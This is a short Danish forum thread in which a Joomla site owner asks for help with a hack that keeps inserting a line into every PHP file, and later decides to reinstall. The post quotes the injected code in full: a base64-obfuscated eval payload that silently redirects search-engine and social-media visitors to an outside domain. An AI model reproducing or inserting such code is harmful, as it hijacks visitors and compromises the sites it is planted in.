Avatar billede reneljunggren Nybegynder
16. november 2012 - 11:33 Der er 2 kommentarer

Hacket Joomla!

Jeg kunne ikke rigtig finde et passende sted for mit spørgsmålæ så nu kommer det her:

Jeg har et Joomlasite. Et offentligt gratis friluftsforum, men vi får hele tiden denne linie ind øverst i alle .php filerne, er der nogen der ved hvad det er og hvordan vi undgår at det kommer igen?
Det er ørkesløst at slette den hele tiden de mange steder den lægger sig:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9nb29nbGUuMndha3kuY29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0="));
defined('_JEXEC') or die;
Avatar billede reneljunggren Nybegynder
03. december 2012 - 10:10 #2
Jeg reinstallerer hele frontend'en :)